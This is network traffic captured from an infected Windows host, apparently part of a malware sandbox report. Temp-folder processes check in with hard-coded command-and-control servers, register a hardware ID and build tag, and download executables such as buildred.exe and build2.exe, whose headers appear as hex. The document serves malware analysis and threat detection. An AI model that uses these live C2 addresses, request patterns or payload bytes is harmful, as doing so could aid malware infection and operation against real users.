Jul 26, 2024 17:57:06.171812057 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000025001&unit=246122658369
Jul 26, 2024 17:57:07.701535940 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 26, 2024 17:57:07.702379942 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 26, 2024 17:57:07.703301907 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 26, 2024 17:57:07.731515884 CEST	56	OUT	GET /inc/buildred.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 17:57:08.010703087 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:07 GMT Content-Type: application/octet-stream Content-Length: 311296 Last-Modified: Fri, 26 Jul 2024 15:36:02 GMT Connection: keep-alive ETag: "66a3c262-4c000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 1c a2 f4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 a2 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 34 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELG0 @ @PO 4 H.text `.rsrc @@.reloc@B
Jul 26, 2024 17:57:08.010735989 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 00 00 00 00 48 00 00 00 02 00 05 00 54 2d 01 00 e8 7f 01 00 03 00 00 Data Ascii: HT-M<01s,~%-&~ls-%(+o/8o0%rprYp~1(2
Jul 26, 2024 17:57:08.010768890 CEST	1236	IN	Data Raw: 0a 7e d7 02 00 04 25 2d 17 26 7e ce 02 00 04 fe 06 74 03 00 06 73 4f 00 00 0a 25 80 d7 02 00 04 28 06 00 00 2b 6f 65 01 00 06 00 11 07 11 06 fe 06 68 03 00 06 73 50 00 00 0a 7e d8 02 00 04 25 2d 17 26 7e ce 02 00 04 fe 06 75 03 00 06 73 51 00 00 Data Ascii: ~%-&~tsO%(+oehsP~%-&~usQ%(+ogisR~%-&~vsS%(+ok(+,dsm%o_%rp(>oa%sUoc%oi%ok%sV
Jul 26, 2024 17:57:08.010780096 CEST	1236	IN	Data Raw: 11 07 11 07 6f 8c 01 00 06 28 4b 00 00 0a 2d 09 11 07 6f 8c 01 00 06 2b 05 72 fd 02 00 70 6f 8d 01 00 06 00 11 07 11 07 6f 8e 01 00 06 28 4b 00 00 0a 2d 09 11 07 6f 8e 01 00 06 2b 05 72 fd 02 00 70 6f 8f 01 00 06 00 11 07 11 07 6f 90 01 00 06 28 Data Ascii: o(K-o+rpoo(K-o+rpoo(K-o+rpoorp(b,ocXo:+*AdzJzR
Jul 26, 2024 17:57:08.010957003 CEST	1236	IN	Data Raw: 04 2b 00 11 04 2a 00 41 4c 00 00 00 00 00 00 75 00 00 00 bc 00 00 00 31 01 00 00 05 00 00 00 13 00 00 01 00 00 00 00 42 00 00 00 26 01 00 00 68 01 00 00 06 00 00 00 1a 00 00 01 00 00 00 00 07 00 00 00 6a 01 00 00 71 01 00 00 06 00 00 00 1a 00 00 Data Ascii: +*ALu1B&hjq0=sW%(`sa(\(],(sr-prp~1(2o&8s%oo^o%
Jul 26, 2024 17:57:08.010967016 CEST	1236	IN	Data Raw: 00 0a 0b 06 17 58 0a 06 18 fe 02 0c 08 2c 05 00 07 0d 2b 15 00 03 07 6f 78 00 00 0a 16 fe 01 13 04 11 04 2d d6 07 0d 2b 00 09 2a 1b 30 03 00 57 01 00 00 0a 00 00 11 00 73 55 00 00 0a 0a 00 73 79 00 00 0a 0b 1f 21 8d b3 00 00 01 25 d0 c5 02 00 04 Data Ascii: X,+ox-+*0WsUsy!%(`%(`ozozo{sarp~1(2(\|(}orrp(~(o%(`"%(`oz
Jul 26, 2024 17:57:08.010977030 CEST	1236	IN	Data Raw: 00 0a 28 32 00 00 0a 28 7c 00 00 0a 6f 72 00 00 0a a2 28 98 01 00 06 6f 33 00 00 0a 13 04 38 c3 00 00 00 12 04 28 34 00 00 0a 13 05 00 11 05 73 35 00 00 0a 28 36 00 00 0a 6f 37 00 00 0a 13 06 11 05 1f 1a 28 8f 00 00 0a 6f 38 00 00 0a 2d 09 11 06 Data Ascii: (2(\|or(o38(4s5(6o7(o8-(+((9,+tsm%o_%sooa%(soi%sUoc%sVoe%sWogol,oX(Y:1
Jul 26, 2024 17:57:08.010987997 CEST	1236	IN	Data Raw: 72 29 04 00 70 7e 31 00 00 0a 28 32 00 00 0a 1c 8d b3 00 00 01 25 d0 8f 02 00 04 28 60 00 00 0a 73 61 00 00 0a 72 33 04 00 70 7e 31 00 00 0a 28 32 00 00 0a 28 3e 00 00 0a 28 5c 00 00 0a 73 90 00 00 0a 0b 07 6f 94 00 00 0a 16 fe 01 0c 08 2c 07 06 Data Ascii: r)p~1(2%(`sar3p~1(2(>(\so,t8R%r;p%r;p%r;p%%(`sar=p~1(29oo8oo8
Jul 26, 2024 17:57:08.011234045 CEST	1236	IN	Data Raw: 13 06 11 06 2c 20 06 11 05 1f 0a 59 1f 41 58 d1 13 07 12 07 28 a2 00 00 0a 28 a3 00 00 0a 28 3e 00 00 0a 0a 2b 13 06 12 05 28 a2 00 00 0a 28 a4 00 00 0a 28 3e 00 00 0a 0a 11 04 1f 09 fe 02 13 08 11 08 2c 20 06 11 04 1f 0a 59 1f 41 58 d1 13 07 12 Data Ascii: , YAX(((>+(((>, YAX(((>+(((>Xo.X]+,rp(>Xo:+&(*0-,+,+,
Jul 26, 2024 17:57:08.011245012 CEST	1236	IN	Data Raw: 02 16 91 1f 18 62 02 17 91 1f 10 62 60 02 18 91 1e 62 60 02 19 91 60 0a 2b 00 06 2a 00 00 00 13 30 04 00 2c 00 00 00 1d 00 00 11 00 02 03 91 1f 18 62 02 03 17 58 25 10 01 91 1f 10 62 60 02 03 17 58 25 10 01 91 1e 62 60 02 03 17 58 25 10 01 91 60 Data Ascii: bb`b``+0,bX%b`X%b`X%`+0((+n bn`+0 (+X(+n bn`+b dm((m()n dm()mX()*zd
Jul 26, 2024 17:57:08.011408091 CEST	1236	IN	Data Raw: 30 03 00 29 00 00 00 20 00 00 11 00 02 19 95 17 5f 16 fe 03 0a 02 28 46 00 00 06 00 06 0b 07 2c 12 00 02 16 8f c8 00 00 01 25 4b 20 00 00 00 e1 61 54 00 2a 00 00 00 13 30 05 00 4e 00 00 00 24 00 00 11 00 02 19 95 0a 02 1e 28 47 00 00 06 00 1d 0b Data Ascii: 0) _(F,%K aT0N$(G+1n_bj_j,%K Y_daTY-05%+(c`X%,b+++*03&+&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	61183	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:06.517956972 CEST	182	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Jul 26, 2024 17:57:07.703054905 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 26, 2024 17:57:07.703743935 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 26, 2024 17:57:07.709644079 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	61184	185.215.113.16	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:07.747513056 CEST	55	OUT	GET /cost/random.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 17:57:08.531816959 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:08 GMT Content-Type: application/octet-stream Content-Length: 91648 Last-Modified: Fri, 26 Jul 2024 15:01:21 GMT Connection: keep-alive ETag: "66a3ba41-16600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb@]2V0@\|qpt,.code78 `.textP< `.rdata304@@.data,pD@.rsrcV@@
Jul 26, 2024 17:57:08.531841040 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ac 00 00 00 68 00 00 00 00 68 10 80 41 00 e8 5c 40 00 00 83 c4 0c 68 00 00 00 00 Data Ascii: hhhA\@hU@AhhhB@A?pA4AICZx}@Ck.pAA?h?<AP
Jul 26, 2024 17:57:08.531852961 CEST	1236	IN	Data Raw: 8d 05 b8 80 41 00 50 31 c0 50 68 15 00 00 00 68 04 00 00 00 e8 1d 8d 00 00 ff 35 a0 80 41 00 e8 0c 93 00 00 68 07 00 00 00 68 78 70 41 00 8d 05 a0 80 41 00 50 68 08 00 00 00 e8 5f 92 00 00 ff 35 a8 80 41 00 e8 e6 92 00 00 68 08 00 00 00 68 70 70 Data Ascii: AP1Phh5AhhxpAAPh_5AhhppAAPh9hAhpAhhh:pAlA+?5AhhppAAPh;@PRZPhHA:XAufS
Jul 26, 2024 17:57:08.531944036 CEST	1236	IN	Data Raw: 00 00 5a 50 52 e8 f8 c8 00 00 5a 50 b8 66 70 41 00 50 ff 74 24 10 ff 35 90 80 41 00 e8 51 42 00 00 8d 44 24 0c 50 e8 17 c9 00 00 ff 74 24 08 e8 e9 0e 00 00 21 c0 74 4c 52 e8 c4 c8 00 00 5a 50 ff 74 24 0c e8 33 16 00 00 8d 44 24 10 50 e8 ef c8 00 Data Ascii: ZPRZPfpAPt$5AQBD$Pt$!tLRZPt$3D$PT$RZPR=T$R3fpAR(D$PD$at$@D$hD$Pt$4Pt$ 5<AX:t$;$pAA:AD$R
Jul 26, 2024 17:57:08.531954050 CEST	268	IN	Data Raw: 00 00 ff 35 78 80 41 00 e8 88 8d 00 00 ff 35 78 80 41 00 e8 5b 8c 00 00 ff 74 24 10 68 00 00 00 00 b8 24 70 41 00 50 ff 35 78 80 41 00 e8 16 36 00 00 52 e8 f6 c3 00 00 5a 50 52 e8 ee c3 00 00 5a 50 ff 74 24 18 e8 23 81 00 00 8d 05 2c 80 41 00 50 Data Ascii: 5xA5xA[t$h$pAP5xA6RZPRZPt$#,AP5,A35,At$h$pAP5,A55,Aw8RZPRZPt$@AP5@At$5@A>8t$h$pAP5,A]5R=ZP
Jul 26, 2024 17:57:08.532071114 CEST	1236	IN	Data Raw: 5e c3 00 00 ff 74 24 10 e8 15 80 00 00 eb 02 31 c0 ff 74 24 14 e8 d8 c3 00 00 ff 74 24 08 e8 cf c3 00 00 ff 74 24 0c e8 c6 c3 00 00 83 c4 18 5b c3 55 53 31 c0 50 50 50 50 50 50 e8 22 c4 00 00 52 e8 dc c2 00 00 5a 50 68 02 00 00 00 68 00 00 00 00 Data Ascii: ^t$1t$t$t$[US1PPPPPP"RZPhhRZPRZPz5$45$h!@Pt$44$45AA!5A65A@tz-AURKZPRD$Pyt$A
Jul 26, 2024 17:57:08.532080889 CEST	1236	IN	Data Raw: 00 4a 75 f3 e8 85 bf 00 00 8b 54 24 5c 8d 0c 24 e8 19 30 00 00 8b 54 24 60 8d 4c 24 04 e8 0c 30 00 00 8b 54 24 64 8d 4c 24 08 e8 ff 2f 00 00 8d 44 24 0c 8d 6c 24 0c c7 45 00 3c 00 00 00 c7 45 04 40 01 00 00 c7 45 1c 00 00 00 00 b8 42 70 41 00 50 Data Ascii: JuT$\$0T$`L$0T$dL$/D$l$E<E@EBpAPXE$PXED$PXED$PXED$P2D$Hhx4D$LPl$u8/!t\$LtD$L14$at$Xt$OP[]S\$uhW.@P
Jul 26, 2024 17:57:08.532213926 CEST	448	IN	Data Raw: ba 00 00 ff 74 24 2c e8 8e 2c 00 00 b8 d4 70 41 00 a3 34 80 41 00 c7 04 24 00 00 00 00 eb 00 b8 06 00 00 00 3b 04 24 7c 64 a1 34 80 41 00 0f be 00 89 44 24 04 ff 05 34 80 41 00 52 e8 39 b9 00 00 5a 50 52 e8 31 b9 00 00 5a 50 8b 5c 24 0c 6b db ff Data Ascii: t$,,pA4A$;$\|d4AD$4AR9ZPR1ZP\$kSb8D$PXT$RZPRT$RD$P2$qRZPRZP+PvD$PT$RZPRVD$PD$P-D$t$7D$\$!~ZR
Jul 26, 2024 17:57:08.532299042 CEST	1236	IN	Data Raw: 74 24 10 e8 fc 29 00 00 89 04 24 ff 74 24 10 ff 74 24 10 e8 f2 29 00 00 a3 20 80 41 00 ff 35 20 80 41 00 e8 b2 74 00 00 89 44 24 04 ff 35 20 80 41 00 ff 74 24 08 ff 74 24 08 e8 7b 75 00 00 ff 34 24 e8 c9 29 00 00 8b 44 24 04 eb 02 31 c0 83 c4 08 Data Ascii: t$)$t$t$) A5 AtD$5 At$t${u4$)D$1US$JuT$P$ )D$D$ D$;D$ RZPRZPRZPRZPh\$4-Akuc)$7D$(PR
Jul 26, 2024 17:57:08.532309055 CEST	1236	IN	Data Raw: e8 b1 b3 00 00 ff 74 24 28 e8 a8 b3 00 00 ff 74 24 38 e8 9f b3 00 00 ff 34 24 e8 97 b3 00 00 83 c4 44 5b 5d c2 04 00 55 ba 09 00 00 00 83 ec 04 c7 04 24 00 00 00 00 4a 75 f3 e8 e7 b3 00 00 8d 04 24 50 e8 00 25 00 00 8d 2c 24 66 83 7d 00 00 74 07 Data Ascii: t$(t$84$D[]U$Ju$P%,$f}t1$]1PPPt$%T$$G$h'}oD$h't$t$$RAZPR9ZPht$oD$P_t$oT$RZPRXP$Z#
Jul 26, 2024 17:57:08.537025928 CEST	1236	IN	Data Raw: e8 0d ae 00 00 5a 50 68 01 00 00 00 ff 74 24 14 e8 7d a0 00 00 e8 fa 20 00 00 01 14 24 e8 20 2e 00 00 8d 44 24 04 50 e8 26 ae 00 00 ff 34 24 e8 fb fd ff ff 89 44 24 04 52 e8 d4 ad 00 00 5a 50 ff 74 24 08 e8 ed f0 ff ff e8 e4 20 00 00 52 e8 be ad Data Ascii: ZPht$} $ .D$P&4$D$RZPt$ RZPRZP$pAP5(AxbD$PT$1. FRZPRzZPRrZPRjZPh5HAU ${-D$PR;ZPR3ZPR+ZPR#ZPh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	61185	85.28.47.31	80	3144	C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:07.952317953 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 17:57:08.577615976 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:57:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:57:08.581362963 CEST	409	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGI Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 2d 2d 0d 0a Data Ascii: ------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="build"sila------GDBFCGIIIJDBGCBGIDGI--
Jul 26, 2024 17:57:08.769778013 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:57:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	61186	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:09.322292089 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000027001&unit=246122658369
Jul 26, 2024 17:57:10.089332104 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 26, 2024 17:57:10.101007938 CEST	54	OUT	GET /inc/build2.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 17:57:10.353583097 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:10 GMT Content-Type: application/octet-stream Content-Length: 2755072 Last-Modified: Fri, 26 Jul 2024 15:52:43 GMT Connection: keep-alive ETag: "66a3c64b-2a0a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 a1 9c a3 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 00 00 00 b0 27 00 00 06 2a 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 30 00 00 04 00 00 a3 71 2a 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 30 00 0c 05 00 00 00 b0 30 00 38 01 00 00 00 80 29 00 8c 4c 00 00 00 00 00 00 00 00 00 00 00 c0 30 00 9c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6e [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf.'`@0q` 008)L0n)(X0.text''``.data`''@.rdata((@@.pdataL)Nh)@@.xdata0B)D)@@.bss^ .idata0)@.CRTX0@.tls0@.rsrc80@@.reloc0*@B
Jul 26, 2024 17:57:10.353632927 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 48 89 e5 48 89 4d 10 48 89 55 18 4c 89 45 20 44 89 4d 28 90 5d c3 55 48 Data Ascii: UHHMHULE DM(]UHH *Ha)t''.'H'b).'Hb)'H`)uHb)H'H ]UHH0E
Jul 26, 2024 17:57:10.353641987 CEST	1236	IN	Data Raw: 00 00 48 8b 05 10 61 29 00 c7 00 01 00 00 00 e8 3d 00 00 00 89 45 fc 90 90 8b 45 fc 48 83 c4 30 5d c3 55 48 89 e5 48 83 ec 30 c7 45 fc ff 00 00 00 48 8b 05 e1 60 29 00 c7 00 00 00 00 00 e8 0e 00 00 00 89 45 fc 90 90 8b 45 fc 48 83 c4 30 5d c3 55 Data Ascii: Ha)=EEH0]UHH0EH`)EEH0]UHHpHEE0EeHHEHEH@HEE!HEH;EuEEHRp0H`)HEHEHEHEHMHEHUHHEH}uH`)u*
Jul 26, 2024 17:57:10.353770018 CEST	224	IN	Data Raw: 00 00 00 48 89 c1 48 83 c1 38 48 89 4c 24 50 48 8b 40 38 48 89 44 24 58 48 83 f8 00 0f 84 4b 01 00 00 48 8b 44 24 78 48 8b 4c 24 58 48 8b 09 48 89 4c 24 40 48 8b 48 08 48 8b 00 48 39 c1 48 89 44 24 48 0f 8f b7 00 00 00 8b 05 66 ac 27 00 8b 15 64 Data Ascii: HH8HL$PH@8HD$XHKHD$xHL$XHHL$@HHHH9HD$Hf'd'1)]#5]#)1)'-:yWi^w)=DHL$x'D'A51Ai\OA]b%1AD$4=HL$xD$4H
Jul 26, 2024 17:57:10.353780031 CEST	1236	IN	Data Raw: 09 48 89 4c 24 38 3d 91 3d ff 98 0f 84 a7 ff ff ff 48 8b 44 24 38 48 89 44 24 48 e9 00 00 00 00 48 8b 54 24 40 4c 8b 4c 24 50 48 8b 44 24 78 48 8b 4c 24 48 48 8b 40 10 49 89 ca 49 c1 e2 04 49 89 c0 4d 01 d0 4d 89 08 49 89 c8 49 c1 e0 04 4c 01 c0 Data Ascii: HL$8==HD$8HD$HHT$@LL$PHD$xHL$HH@IIIMMIILHHHHHD$(HH!HHD$xHL$(HHfDH(HL$ H\)HL$ H(b9fHHT$hHL$pHHHD$xHAH$H
Jul 26, 2024 17:57:10.353790045 CEST	1236	IN	Data Raw: ff 60 77 28 5e e9 45 ff ff ff 48 83 ec 28 48 89 4c 24 20 48 8b 05 47 58 29 00 8b 08 e8 4d e7 00 00 48 8b 4c 24 20 48 83 c4 28 e9 e2 3a 00 00 66 90 56 48 81 ec a0 00 00 00 48 89 94 24 90 00 00 00 48 89 8c 24 98 00 00 00 8b 05 e2 a6 27 00 35 36 43 Data Ascii: `w(^EH(HL$ HGX)MHL$ H(:fVHH$H$'56C'^ AA!A,,?F;!1T8-A1A8D!D1-E$D!+_~gADA5WW
Jul 26, 2024 17:57:10.353801966 CEST	208	IN	Data Raw: ce d1 d6 35 6b ca 4a 58 31 c2 8b 0d 71 a2 27 00 89 d0 83 f0 ff 41 b8 92 14 70 cb 41 81 f0 6d eb 8f 34 44 31 c2 09 d0 21 c9 83 f1 ff 83 f0 ff 83 f1 ff 09 c8 89 c2 83 f2 ff 81 e2 48 be 36 99 41 b8 46 36 f3 d6 41 81 f0 0e 88 c5 4f b9 f0 70 fe e5 81 Data Ascii: 5kJX1q'ApAm4D1!H6AF6AOpA1D!H6H62Pib%9f%=m'5;!+'R?1-y@D$$U59$D$
Jul 26, 2024 17:57:10.354305029 CEST	1236	IN	Data Raw: 18 e5 00 00 8b 4c 24 20 8b 44 24 24 39 c8 0f 87 b5 ff ff ff e9 10 00 00 00 48 8b 84 24 90 00 00 00 48 8b 4c 24 28 48 89 08 8b 05 8e a1 27 00 8b 15 8c a1 27 00 89 c1 83 c1 01 83 f0 ff 09 d0 01 c8 b9 05 3b 69 0e 31 d2 f7 f1 89 c1 81 e1 85 c3 48 a4 Data Ascii: L$ D$$9H$HL$(H'';i1H5H{W8C1+)9$A'?'O{1A.f5zjO1D!D&1Dohy4ADA5@
